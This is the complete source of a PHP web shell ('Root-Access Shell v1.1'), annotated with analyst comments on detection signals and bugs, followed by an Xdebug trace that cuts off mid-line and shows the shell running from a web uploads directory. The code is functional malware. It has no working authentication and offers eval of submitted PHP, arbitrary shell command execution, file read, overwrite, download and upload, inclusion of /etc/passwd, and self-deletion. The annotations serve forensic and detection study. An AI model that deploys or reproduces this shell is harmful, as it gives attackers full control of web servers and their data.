<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Qurd_Az_SH3LL</title>
</head>
<body>
<p align="center"><b><font size="6" color="#008000">
<a href="mailto:--------------------------------%3C%20Qurd_Az_SH3ll%20%3C%3C%3C----%3E%3E%3E%20Email:Qurd_Az@Box.AZ%3E%20%3E--------------------------------">
<span style="text-decoration: none">Email : Qurd_Az@Box.Az</span></a></font></b></p>
<p align="center"><b><font size="6" color="#008000">..:: 0wn3R By Qurd_Az ::..</font></b></p>
</body>
</html>
<?php
// Top-level bootstrap of the web shell: session setup, error suppression, a disabled
// HTTP Basic auth gate, and the early dispatch of the file-download action.
$auth = 0;
// Intended auth switch (1 = on, 0 = off). NOTE(review): $auth is never read in the
// visible code; the gate below is controlled by a literal `false` instead.
// Sets session.gc_maxlifetime to 1 before the session is started.
ini_set("session.gc_maxlifetime", 1);
session_start();
// Turns off PHP error reporting for the rest of the request.
error_reporting(0);
// Runs the command-execution canary; the result is stored in $_SESSION['safe_mode'].
safe_mode();
$name = "63a9f0ea7bb98050796b649e85481845";
// MD5 of the expected login; per the original author's note the login is "root".
$pass = "9df3b01c60df20d13843841ff0d4482c";
// MD5 of the expected password; per the original author's note the password is "access".
// Both hash literals are fixed strings in the file and are usable for static signature matching.
// The credential check is wrapped in `if (false)`, so it is dead code: every request
// reaches the handlers below without authentication.
if (false) {
// NOTE(review): $HTTP_SERVER_VARS is a legacy long-array name and is presumably not
// populated on current PHP versions; confirm against the runtime under analysis.
// The comparison uses unsalted MD5 and the loose `!=` operator.
if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER']) != $name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW']) != $pass) {
header("WWW-Authenticate: Basic realm=\"PanelAccess\"");
header("HTTP/1.0 401 Unauthorized");
exit("Access Denied");
}
}
// Action 11: hands the request-supplied path in POST "value" to download().
// The path is taken from the request as-is apart from stripslashes().
if ($_POST['type'] == 11) {
download(stripslashes($_POST['value']));
}
/**
 * Sends the file at $dfilename to the client as an attachment.
 *
 * Called from the top-level dispatch when POST "type" is 11. The path is
 * request-controlled and is not restricted to any directory, so what can be read
 * is bounded only by the permissions of the account running PHP.
 *
 * @param string $dfilename Path of the file to read.
 */
function download($dfilename)
{
// The fopen() result is not checked before it is used by fread()/fclose().
$file = fopen($dfilename, "r");
// Erases whatever is in the active output buffer before the file is emitted.
ob_clean();
// Only the last path component is exposed as the attachment name.
$filename = basename($dfilename);
// Reads the whole file in one call; filesize() warnings are suppressed with @.
$filedump = fread($file, @filesize($dfilename));
fclose($file);
// $mime_type is not defined in this function, so the header carries no media type.
header("Content-type: " . $mime_type);
header("Content-disposition: attachment; filename=\"" . $filename . "\";");
// There is no exit after this echo; the function returns to the caller.
echo $filedump;
}
/**
 * Reports whether running `perl -h` through ex() produces any output.
 *
 * The page template calls this on every render, so each page load makes the PHP
 * process spawn `perl -h`; the trace on this page shows that exec() call. A web
 * server worker launching interpreter help commands is a useful process-lineage
 * signal for detection.
 *
 * @return string HTML fragment labelled "ON" when output was returned, else "OFF".
 */
function testperl()
{
// Truthiness of the captured output decides the label; the exit status is not inspected.
if (ex('perl -h')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
/**
 * Formats a byte count for display in the "Server Info" panel.
 *
 * Values of 1024 and above are scaled to the largest fitting unit (KB, MB, GB)
 * and rounded to two decimals; smaller values are returned with a " B" suffix.
 *
 * @param int|float $size Size in bytes.
 * @return string Human-readable size such as "216.08 GB" or "500 B".
 */
function view_size($size)
{
    // Largest unit first so the first threshold that fits wins.
    $thresholds = array(
        " GB" => 1073741824,
        " MB" => 1048576,
        " KB" => 1024,
    );

    foreach ($thresholds as $suffix => $divisor) {
        if ($size >= $divisor) {
            // Scale by 100, round, scale back: keeps two decimal places.
            $scaled = @round($size / $divisor * 100) / 100;
            return $scaled . $suffix;
        }
    }

    return $size . " B";
}
/**
 * Reports whether running `fetch --help` through ex() produces any output.
 *
 * NOTE(review): no call to this function appears in the visible page template.
 *
 * @return string HTML fragment labelled "ON" when output was returned, else "OFF".
 */
function testfetch()
{
// Truthiness of the captured output decides the label; the exit status is not inspected.
if (ex('fetch --help')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
/**
 * Reports whether running `wget --help` through ex() produces any output.
 *
 * The page template calls this on every render, so each page load makes the PHP
 * process spawn `wget --help`; the trace on this page shows that exec() call.
 *
 * @return string HTML fragment labelled "ON" when output was returned, else "OFF".
 */
function testwget()
{
// Truthiness of the captured output decides the label; the exit status is not inspected.
if (ex('wget --help')) {
return "<font size=2 color=#29a329>ON</font>";
} else {
return "<font size=2 color=#ff4500>OFF</font>";
}
}
/**
 * Reports whether the Oracle client function ocilogon() is defined in this PHP build.
 *
 * Only checks that the function exists; no connection is attempted.
 *
 * @return string HTML fragment labelled "ON" or "OFF".
 */
function oracle()
{
    $available = function_exists('ocilogon');

    return $available
        ? "<font size=2 color=#29a329>ON</font>"
        : "<font size=2 color=#ff4500>OFF</font>";
}
/**
 * Reports whether the PostgreSQL client function pg_connect() is defined in this PHP build.
 *
 * Only checks that the function exists; no connection is attempted.
 *
 * @return string HTML fragment labelled "ON" or "OFF".
 */
function postgresql()
{
    $available = function_exists('pg_connect');

    return $available
        ? "<font size=2 color=#29a329>ON</font>"
        : "<font size=2 color=#ff4500>OFF</font>";
}
/**
 * Reports whether the legacy function mssql_connect() is defined in this PHP build.
 *
 * Only checks that the function exists; no connection is attempted.
 *
 * @return string HTML fragment labelled "ON" or "OFF".
 */
function testmssql()
{
    $available = function_exists('mssql_connect');

    return $available
        ? "<font size=2 color=#29a329>ON</font>"
        : "<font size=2 color=#ff4500>OFF</font>";
}
/**
 * Reports whether the cURL extension function curl_version() is defined in this PHP build.
 *
 * Only checks that the function exists; no request is made.
 *
 * @return string HTML fragment labelled "ON" or "OFF".
 */
function testcurl()
{
    $available = function_exists('curl_version');

    return $available
        ? "<font size=2 color=#29a329>ON</font>"
        : "<font size=2 color=#ff4500>OFF</font>";
}
/**
 * Reports whether the legacy function mysql_connect() is defined in this PHP build.
 *
 * Only checks that the function exists; no connection is attempted.
 *
 * @return string HTML fragment labelled "ON" or "OFF".
 */
function testmysql()
{
    $available = function_exists('mysql_connect');

    return $available
        ? "<font size=2 color=#29a329>ON</font>"
        : "<font size=2 color=#ff4500>OFF</font>";
}
/**
 * Probes whether shell commands can be executed and records the result in the session.
 *
 * Runs `echo abch0ld` through ex() and checks whether "h0ld" is found at offset 3
 * of the output. If it is, $_SESSION['safe_mode'] is set to 0 and the "OFF" label
 * is returned; any other result sets it to 1 and returns "ON".
 *
 * The function runs once during bootstrap and again when the page is rendered, so the
 * literal command line `echo abch0ld` appears twice per request in the trace on
 * this page. That fixed string is a practical search term for process-execution
 * telemetry on web servers.
 *
 * @return string HTML fragment labelled "ON" or "OFF".
 */
function safe_mode()
{
// $safe_mode is not defined in this scope, so `!$safe_mode` is always true and the
// outcome depends only on the canary command's output.
if (!$safe_mode && strpos(ex("echo abch0ld"), "h0ld") != 3) {
$_SESSION['safe_mode'] = 1;
return "<font size=2 color=#29a329>ON</font>";
} else {
$_SESSION['safe_mode'] = 0;
return "<font size=2 color=#ff4500>OFF</font>";
}
}
/**
 * Runs a shell command and returns whatever output was captured.
 *
 * Tries exec(), passthru(), system() and shell_exec() in that order, using the first
 * one that function_exists() reports, and falls back to popen() last. Every
 * command-running feature of this file goes through this function, so restricting
 * these PHP functions for the web SAPI (for example through the `disable_functions`
 * directive) and preventing script execution in upload directories removes the
 * capability at its source. The trace on this page shows the file running from
 * /var/www/html/uploads/.
 *
 * @param string $in Command line; passed to the underlying function unmodified.
 * @return mixed Captured output; '' when no branch ran.
 */
function ex($in)
{
$out = '';
if (function_exists('exec')) {
// exec() fills $out with an array of output lines, which is then joined back.
exec($in, $out);
$out = join("\n", $out);
} elseif (function_exists('passthru')) {
// passthru() writes straight to output, so it is captured with an output buffer.
ob_start();
passthru($in);
$out = ob_get_contents();
ob_end_clean();
} elseif (function_exists('system')) {
// Same buffering approach as the passthru() branch.
ob_start();
system($in);
$out = ob_get_contents();
ob_end_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = popen($in, "r"))) {
// Last resort: read the process pipe in 1024-byte chunks until end of stream.
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
return $out;
}
/**
 * Request dispatcher for the main panel: selects an action from POST "type".
 *
 * Every branch consumes request data directly; the only transformation applied is
 * stripslashes(). The caller in the template HTML-escapes the return value, but
 * several branches write to the response themselves. For detection, the POST
 * field names "type", "value", "newname" and "userfile" together with small integer
 * "type" values are the request shape this file expects.
 *
 * @return mixed Directory listing text, an error string, or null.
 */
function shell()
{
if ($_POST['type'] == 1) {
// Type 1: evaluates the submitted text as PHP code.
eval(stripslashes($_POST['value']));
} elseif ($_POST['type'] == 2) {
// Type 2: runs the submitted text as a shell command after pwd() changes directory.
pwd();
print_r(ex(stripslashes($_POST['value'])));
} elseif ($_POST['type'] == 3) {
// Type 3: directory listing; the branch taken depends on the canary result
// stored in the session by safe_mode().
if ($_SESSION['safe_mode'] == 1) {
if (($u = safe_ex('ls -la')) != '') {
return $u;
} else {
return safe_ex('dir');
}
} else {
// Tries the Unix listing first and falls back to `dir` when it yields nothing.
if (($u = ex('ls -la')) != '') {
return $u;
} else {
return ex('dir');
}
}
} elseif ($_POST['type'] == 4) {
// Type 4: prints the named file (HTML-escaped) and remembers it for a later save.
if (file_exists(stripslashes($_POST['value']))) {
// $safe_mode is not defined in this scope, so this condition is always true and
// the safe_read() branch is not reachable from here.
if ($safe_mode != 1) {
echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']), "rw"), filesize(stripslashes($_POST['value']))));
} else {
echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
}
$_SESSION['edit'] = 1;
$_SESSION['filename'] = $_POST['value'];
} else {
return "File doesn't exists!";
}
} elseif ($_POST['type'] == 5) {
// Type 5: overwrites the file remembered in the session with the submitted text.
fputs(fopen($_SESSION['filename'], "w"), stripslashes($_POST['value']));
} elseif ($_POST['type'] == 6) {
// Type 6: stores an uploaded file in the current directory. The name is POST
// "newname" when given, otherwise the client-supplied file name; neither is validated.
$uploaddir = pwd();
if (!($name = $_POST['newname'])) {
$name = $_FILES['userfile']['name'];
}
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
} else {
// Any other request (including a plain page load) returns a directory listing;
// the trace on this page shows `ls -la` being run on the initial request.
$u = ex('ls -la');
if ($u == '') {
return ex('dir');
} else {
return $u;
}
}
return null;
}
/**
 * Emits the "Save" button once after a file has been opened for editing.
 *
 * The flag $_SESSION['edit'] is set by the file-view action; this function clears
 * it so the button is shown for a single render only.
 *
 * @return string|null Button markup when the flag was set, otherwise null.
 */
function edit()
{
    // Nothing pending: fall through with no return value.
    if ($_SESSION['edit'] != 1) {
        return;
    }

    $_SESSION['edit'] = 0;

    return "<br><center><input type=submit value=\"Save\"></center>";
}
/**
 * Builds the operating-system banner shown in the "Server Info" panel.
 *
 * @return string OS name, release and version from php_uname(), separated by spaces.
 */
function getsystem()
{
    $fields = array(
        php_uname('s'),
        php_uname('r'),
        php_uname('v'),
    );

    return implode(" ", $fields);
}
/**
 * Returns the web server identification string from the environment.
 *
 * @return string|false Value of SERVER_SOFTWARE, or false when it is not set.
 */
function getserver()
{
    $software = getenv("SERVER_SOFTWARE");

    return $software;
}
/**
 * Returns a description of the account the script runs under.
 *
 * Starts from get_current_user(); unless that is "SYSTEM", it is replaced by the
 * output of `id` run through ex(), and if `id` yields nothing a uid/gid string is
 * built from PHP's own functions instead. In the trace on this page
 * get_current_user() returned 'osboxes' while `id` reported www-data.
 *
 * @return string Account description shown in the "User" field of the panel.
 */
function getuser()
{
$out = get_current_user();
// "SYSTEM" is kept as-is; presumably this marks a Windows host where `id` is absent.
if ($out != "SYSTEM") {
// Spawns `id` on every page render.
if (($out = ex('id')) == '') {
$out = "uid=" . getmyuid() . "(" . get_current_user() . ") gid=" . getmygid();
}
}
return $out;
}
/**
 * Applies the session's working directory and returns it with a trailing separator.
 *
 * When POST "type" is 3 the submitted "value" becomes the new session directory.
 * The function then calls chdir() on the stored value and reports getcwd(). The
 * chdir() result is not checked; in the trace on this page it was called with NULL
 * and returned FALSE, leaving the script's own directory in effect.
 *
 * @return string|null Current directory ending in '/' or '\\'; null when neither
 *                     separator is found past the first character.
 */
function pwd()
{
if ($_POST['type'] == 3) {
// The directory comes from the request and is stored without validation.
$_SESSION['pwd'] = stripslashes($_POST['value']);
}
chdir($_SESSION['pwd']);
$cwd = getcwd();
// strrpos() returning 0 or false is treated the same way here (both are falsy).
if ($u = strrpos($cwd, '/')) {
// Appends '/' unless the path already ends with it.
if ($u != strlen($cwd) - 1) {
return $cwd . '/';
} else {
return $cwd;
}
} elseif ($u = strrpos($cwd, '\\')) {
// Same handling for backslash-separated paths.
if ($u != strlen($cwd) - 1) {
return $cwd . '\\';
} else {
return $cwd;
}
}
}
/**
 * Fallback directory listing that uses PHP's filesystem functions instead of a shell.
 *
 * Called by shell() when the canary in safe_mode() reported that commands cannot be
 * run. $in is only tested for truthiness; the listing always covers '.' regardless
 * of the command string passed in. Output is echoed directly and the function has
 * no return statement.
 *
 * The declaration of safe_read() sits inside this function's body, so safe_read()
 * only becomes defined once safe_ex() has been executed.
 *
 * @param string $in Any truthy value enables the listing.
 */
function safe_ex($in)
{
if ($in) {
$d = dir('.');
while (false !== ($file = $d->read())) {
if ($file == "." || $file == "..") {
continue;
}
@clearstatcache();
list($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
// $unix is not defined in this scope, so `!$unix` is always true and only the
// first (date/size) format below is ever produced.
if (!$unix) {
echo date("d.m.Y H:i", $mtime) . " ";
if (@is_dir($file)) {
echo " <DIR> ";
} else {
printf("% 7s ", $size);
}
} else {
// NOTE(review): perms() is not defined anywhere in the visible code.
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode . " ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ", $nlink, $owner['name'], $grgid['name'], $size);
echo date("d.m.Y H:i ", $mtime);
}
echo "{$file}\n";
}
$d->close();
}
// Nested declaration: intended as a file reader for restricted configurations.
// It echoes the safe_mode and open_basedir settings, includes /etc/passwd,
// calls ini_restore() on both settings and echoes them again. The
// file_get_contents() result is discarded and nothing is returned.
function safe_read($in)
{
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include "/etc/passwd";
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
file_get_contents($in);
}
}
// Self-removal: a GET request carrying kill=done deletes this script from disk and
// confirms with a JavaScript alert. After this runs the file is no longer present
// in the web root, so the request itself (query string `?kill=done` in the access
// log) and filesystem or backup history are what remain for an investigation.
if ($_GET['kill'] == 'done') {
// SCRIPT_FILENAME is the path of the running script; the unlink() result is not checked.
unlink($_SERVER['SCRIPT_FILENAME']);
echo "<script>alert('Your shell script was succefully deleted!')</script>";
}
?>
<html><head><title>Root-Access Shell</title><META http-equiv="Content-Type" content="text/html; charset=CP866">
<style type=text/css>
BODY { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 8px;margin: 0px;padding: 0px;text-align: center;color: #e7e7eb;background-color: #242629;}
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 10px;color: #e7e7eb;}
.contentb {background-color: #44474f;}
.t {padding: 6px;background-color: #242629;}
input,textarea,select
{background: #44474f;
border: 1px solid #242629;
color: #e7e7eb;
font-family: verdana, helvetica, sans-serif;
font-size: 11px;
margin: 5px;
padding: 2px;
vertical-align: middle;}
</style>
<script>
function kill(){
var y;
y = confirm('Do you indeed want to delete web-shell?');
if(y == true){document.location = '?kill=done';}}</script></head><body bgcolor='#242629'><br><center><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Server Info</b></font></th></tr><tr><td class=contentb><table border="0" width="100%"><tr><td width="35%" >System: <font size=1 color=#ff4500><?php
echo getsystem();
?></font></td>
<td width="15%" >PHP-version: <font size=1 color=#29a329><?php
echo phpversion();
?></font></td>
<td width="15%" >Oracle: <?php
echo oracle();
?></td><td width="25%" >Safe_mode: <?php
echo safe_mode();
?></td></tr><tr>
<td width="35%" >Server: <font size=1 color=#ff4500><?php
echo getserver();
?></font></td>
<td width="15%" >MySQL: <?php
echo testmysql();
?></td><td width="15%" >cURL: <?php
echo testcurl();
?></td><td width="25%" >Total space: <?php
echo view_size(disk_total_space(getcwd()));
?></td></tr><tr>
<td width="35%" >PWD: <font size=1 color=#ff4500><?php
if (strlen($u = pwd()) > 45) {
echo "..." . substr($u, strlen($u) - 40, 40);
} else {
echo $u;
}
?></font></td>
<td width="15%" >PostgreSQL: <?php
echo postgresql();
?></td><td width="15%" >WGet: <?php
echo testwget();
?></td><td width="25%" >Free space: <?php
echo view_size(diskfreespace(getcwd()));
?></td></tr><tr>
<td width="35%" >User: <font size=1 color=#ff4500><?php
echo getuser();
?></font></td>
<td width="15%" >MSSQL: <?php
echo testmssql();
?></td><td width="15%" >Perl: <?php
echo testperl();
?></td>
<td width="25%" >Server time: <?php
echo date('H:i d-m-Y');
?></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Shell</b> <a onclick='kill()'><b><font color="#FF0000">[Kill Shell]</font></b></a></font></th></tr>
<tr><td class=contentb><center><form action method=POST><input type=hidden name="type" value=5><textarea cols=150 rows=20 name="value"><?php
echo htmlspecialchars(shell());
?></textarea><?php
echo edit();
?></form><table border="0" width="100%"><tr><td width="50%" align="center"><form action method=POST>
<b>Enter comand:</b><input type=hidden name="type" value=2><input type=text name="value" size=45><input type=submit value="Enter">
</form></td><td width="50%" align="center"><form action method=POST><b>PWD:</b> <input type=text name="value" size=51 value=<?php
echo pwd();
?>><input type=hidden name="type" value=3><input type=submit value="Enter">
</form></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Tools</b></font></th></tr>
<tr><td class=contentb><table border="0" width="100%"><tr><td width="50%"><form action method=POST><b>Edit file:</b><input type=hidden name="type" value=4>
<input type=text name="value" size=52 value=<?php
echo pwd();
?>><input type=submit value="Edit"></form></td>
<td width="50%"><form action method=POST><b>Download:</b><input type=hidden name="type" value=11><input type=text name="value" size=51 value=<?php
echo pwd();
?>><input type=submit value="Download">
</form></td></tr><tr><td width="50%"><form action method=POST><b>Run PHP Code:</b>
<input type=hidden name="type" value=1><textarea rows=5 cols=46 name="value"><?php
echo "echo \"Root-Access Shell\";";
?></textarea><input type=submit value="Run code"></form></td>
<td width="50%"><form enctype="multipart/form-data" action method=POST><b>Upload:</b><input type=hidden name="type" value=6>
<input type=file name="userfile" size=40><br><input type=hidden name="type" value=6><b>New name:</b><input type=text size=37 name="newname"><input type=submit value="Upload">
</form></td> </tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><font size=2><b>Copyright</b></font></th></tr>
<tr><td class=contentb><center><a href="http://forum.root-access.ru"><font size=2 color=#e7e7eb>Root-Access Shell v1.1</font></a></center>
</td></tr></table><br></center></body></html>
<p align="center"><b><font size="4" color="#800000"></font></b></p>
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:27:49.077804]
1 0 1 0.000251 393512
1 3 0 0.000706 480120 {main} 1 /var/www/html/uploads/root.php 0 0
1 A /var/www/html/uploads/root.php 22 $auth = 0
2 4 0 0.000746 480120 ini_set 0 /var/www/html/uploads/root.php 23 2 'session.gc_maxlifetime' 1
2 4 1 0.000765 480224
2 4 R '1440'
2 5 0 0.000780 480120 session_start 0 /var/www/html/uploads/root.php 24 0
2 5 1 0.000853 480872
2 5 R TRUE
2 6 0 0.000870 480872 error_reporting 0 /var/www/html/uploads/root.php 25 1 0
2 6 1 0.000885 480912
2 6 R 22527
2 7 0 0.000899 480872 safe_mode 1 /var/www/html/uploads/root.php 26 0
3 8 0 0.000913 480872 ex 1 /var/www/html/uploads/root.php 66 1 'echo abch0ld'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 9 0 0.000937 480872 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 9 1 0.000951 480912
4 9 R TRUE
4 10 0 0.000964 480896 exec 0 /var/www/html/uploads/root.php 69 2 'echo abch0ld' ''
4 10 1 0.001741 481400
4 10 R 'abch0ld'
4 11 0 0.001771 481304 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'abch0ld']
4 11 1 0.001789 481368
4 11 R 'abch0ld'
3 A /var/www/html/uploads/root.php 69 $out = 'abch0ld'
3 8 1 0.001815 480904
3 8 R 'abch0ld'
3 12 0 0.001829 480904 strpos 0 /var/www/html/uploads/root.php 66 2 'abch0ld' 'h0ld'
3 12 1 0.001843 480976
3 12 R 3
2 A /var/www/html/uploads/root.php 66 _SESSION['safe_mode'] = 0
2 7 1 0.001871 481192
1 A /var/www/html/uploads/root.php 27 $name = '63a9f0ea7bb98050796b649e85481845'
1 A /var/www/html/uploads/root.php 28 $pass = '9df3b01c60df20d13843841ff0d4482c'
2 13 0 0.001909 481192 getsystem 1 /var/www/html/uploads/root.php 157 0
3 14 0 0.001922 481192 php_uname 0 /var/www/html/uploads/root.php 92 1 's'
3 14 1 0.001935 481256
3 14 R 'Linux'
3 15 0 0.001949 481224 php_uname 0 /var/www/html/uploads/root.php 92 1 'r'
3 15 1 0.001961 481304
3 15 R '5.15.0-60-generic'
3 16 0 0.001976 481248 php_uname 0 /var/www/html/uploads/root.php 92 1 'v'
3 16 1 0.001989 481360
3 16 R '#66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023'
2 13 1 0.002005 481288
2 13 R 'Linux 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023'
2 17 0 0.002023 481192 phpversion 0 /var/www/html/uploads/root.php 158 0
2 17 1 0.002035 481256
2 17 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 18 0 0.002051 481192 oracle 1 /var/www/html/uploads/root.php 159 0
3 19 0 0.002062 481192 function_exists 0 /var/www/html/uploads/root.php 57 1 'ocilogon'
3 19 1 0.002076 481232
3 19 R FALSE
2 18 1 0.002089 481192
2 18 R '<font size=2 color=#ff4500>OFF</font>'
2 20 0 0.002105 481192 safe_mode 1 /var/www/html/uploads/root.php 159 0
3 21 0 0.002117 481192 ex 1 /var/www/html/uploads/root.php 66 1 'echo abch0ld'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 22 0 0.002142 481192 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 22 1 0.002155 481232
4 22 R TRUE
4 23 0 0.002170 481216 exec 0 /var/www/html/uploads/root.php 69 2 'echo abch0ld' ''
4 23 1 0.002850 481720
4 23 R 'abch0ld'
4 24 0 0.002873 481624 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'abch0ld']
4 24 1 0.002890 481688
4 24 R 'abch0ld'
3 A /var/www/html/uploads/root.php 69 $out = 'abch0ld'
3 21 1 0.002917 481224
3 21 R 'abch0ld'
3 25 0 0.002930 481224 strpos 0 /var/www/html/uploads/root.php 66 2 'abch0ld' 'h0ld'
3 25 1 0.002944 481296
3 25 R 3
2 A /var/www/html/uploads/root.php 66 _SESSION['safe_mode'] = 0
2 20 1 0.002970 481192
2 20 R '<font size=2 color=#ff4500>OFF</font>'
2 26 0 0.002988 481192 getserver 1 /var/www/html/uploads/root.php 160 0
3 27 0 0.003000 481192 getenv 0 /var/www/html/uploads/root.php 94 1 'SERVER_SOFTWARE'
3 27 1 0.003016 481272
3 27 R 'Apache/2.4.52 (Ubuntu)'
2 26 1 0.003038 481240
2 26 R 'Apache/2.4.52 (Ubuntu)'
2 28 0 0.003054 481192 testmysql 1 /var/www/html/uploads/root.php 161 0
3 29 0 0.003066 481192 function_exists 0 /var/www/html/uploads/root.php 64 1 'mysql_connect'
3 29 1 0.003079 481232
3 29 R FALSE
2 28 1 0.003092 481192
2 28 R '<font size=2 color=#ff4500>OFF</font>'
2 30 0 0.003108 481192 testcurl 1 /var/www/html/uploads/root.php 161 0
3 31 0 0.003120 481192 function_exists 0 /var/www/html/uploads/root.php 62 1 'curl_version'
3 31 1 0.003133 481232
3 31 R TRUE
2 30 1 0.003146 481192
2 30 R '<font size=2 color=#29a329>ON</font>'
2 32 0 0.003163 481192 getcwd 0 /var/www/html/uploads/root.php 161 0
2 32 1 0.003176 481240
2 32 R '/var/www/html/uploads'
2 33 0 0.003190 481240 disk_total_space 0 /var/www/html/uploads/root.php 161 1 '/var/www/html/uploads'
2 33 1 0.003207 481272
2 33 R 232015802368
2 34 0 0.003221 481192 view_size 1 /var/www/html/uploads/root.php 161 1 232015802368
3 35 0 0.003235 481192 round 0 /var/www/html/uploads/root.php 46 1 21608.155441284
3 35 1 0.003248 481224
3 35 R 21608
2 A /var/www/html/uploads/root.php 46 $size = '216.08 GB'
2 34 1 0.003274 481232
2 34 R '216.08 GB'
2 36 0 0.003288 481192 pwd 1 /var/www/html/uploads/root.php 162 0
3 37 0 0.003302 481192 chdir 0 /var/www/html/uploads/root.php 101 1 NULL
3 37 1 0.003325 481280
3 37 R FALSE
3 38 0 0.003339 481240 getcwd 0 /var/www/html/uploads/root.php 102 0
3 38 1 0.003351 481288
3 38 R '/var/www/html/uploads'
2 A /var/www/html/uploads/root.php 102 $cwd = '/var/www/html/uploads'
3 39 0 0.003375 481288 strrpos 0 /var/www/html/uploads/root.php 103 2 '/var/www/html/uploads' '/'
3 39 1 0.003388 481360
3 39 R 13
2 A /var/www/html/uploads/root.php 103 $u = 13
2 36 1 0.003411 481288
2 36 R '/var/www/html/uploads/'
1 A /var/www/html/uploads/root.php 162 $u = '/var/www/html/uploads/'
2 40 0 0.003436 481288 postgresql 1 /var/www/html/uploads/root.php 163 0
3 41 0 0.003447 481288 function_exists 0 /var/www/html/uploads/root.php 59 1 'pg_connect'
3 41 1 0.003460 481328
3 41 R FALSE
2 40 1 0.003472 481288
2 40 R '<font size=2 color=#ff4500>OFF</font>'
2 42 0 0.003488 481288 testwget 1 /var/www/html/uploads/root.php 163 0
3 43 0 0.003506 481288 ex 1 /var/www/html/uploads/root.php 55 1 'wget --help'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 44 0 0.003527 481288 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 44 1 0.003540 481328
4 44 R TRUE
4 45 0 0.003552 481312 exec 0 /var/www/html/uploads/root.php 69 2 'wget --help' ''
4 45 1 0.008176 513848
4 45 R 'and/or open issues at https://savannah.gnu.org/bugs/?func=additem&group=wget.'
4 46 0 0.008230 513672 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'GNU Wget 1.21.2, a non-interactive network retriever.', 1 => 'Usage: wget [OPTION]... [URL]...', 2 => '', 3 => 'Mandatory arguments to long options are mandatory for short options too.', 4 => '', 5 => 'Startup:', 6 => ' -V, --version display the version of Wget and exit', 7 => ' -h, --help print this help', 8 => ' -b, --background go to background after startup', 9 => ' -e, --execute=COMMAND execute a `.wgetrc\'-style command', 10 => '', 11 => 'Logging and input file:', 12 => ' -o, --output-file=FILE log messages to FILE', 13 => ' -a, --append-output=FILE append messages to FILE', 14 => ' -d, --debug print lots of debugging information', 15 => ' -q, --quiet quiet (no output)', 16 => ' -v, --verbose be verbose (this is the default)', 17 => ' -nv, --no-verbose turn off verboseness, without being quiet', 18 => ' --report-speed=TYPE output bandwidth as TYPE. TYPE can be bits', 19 => ' -i, --input-file=FILE download URLs found in local or external FILE', 20 => ' -F, --force-html treat input file as HTML', 21 => ' -B, --base=URL resolves HTML input-file links (-i -F)', 22 => ' relative to URL', 23 => ' --config=FILE specify config file to use', 24 => ' --no-config do not read any config file', 25 => ' --rejected-log=FILE log reasons for URL rejection to FILE', 26 => '', 27 => 'Download:', 28 => ' -t, --tries=NUMBER set number of retries to NUMBER (0 unlimits)', 29 => ' --retry-connrefused retry even if connection is refused', 30 => ' --retry-on-http-error=ERRORS comma-separated list of HTTP errors to retry', 31 => ' -O, --output-document=FILE write documents to FILE', 32 => ' -nc, --no-clobber skip downloads that would download to', 33 => ' existing files (overwriting them)', 34 => ' --no-netrc don\'t try to obtain credentials from .netrc', 35 => ' -c, --continue resume getting a partially-downloaded file', 36 => ' --start-pos=OFFSET start downloading from zero-based position OFFSET', 37 => ' 
